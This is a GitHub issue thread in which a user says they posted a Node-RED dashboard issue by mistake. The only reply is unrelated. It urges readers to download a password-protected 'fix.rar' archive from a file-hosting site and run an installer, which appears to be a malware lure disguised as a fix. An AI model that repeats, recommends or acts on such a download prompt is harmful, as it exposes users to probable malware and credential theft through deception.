### ISSUE TITLE
Mistaken post, can't work out how to delete

### ISSUE THREAD

**Issue by jdotbdot** [FlowFuse/node-red-dashboard#1239]
### Current Behavior
Deleted (pressed enter by mistake)

### Environment

- Dashboard version:
- Node-RED version:
- Node.js version:
- npm version:
- Platform/OS:
- Browser:

### Have you provided an initial effort estimate for this issue?

I have provided an initial effort estimate

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
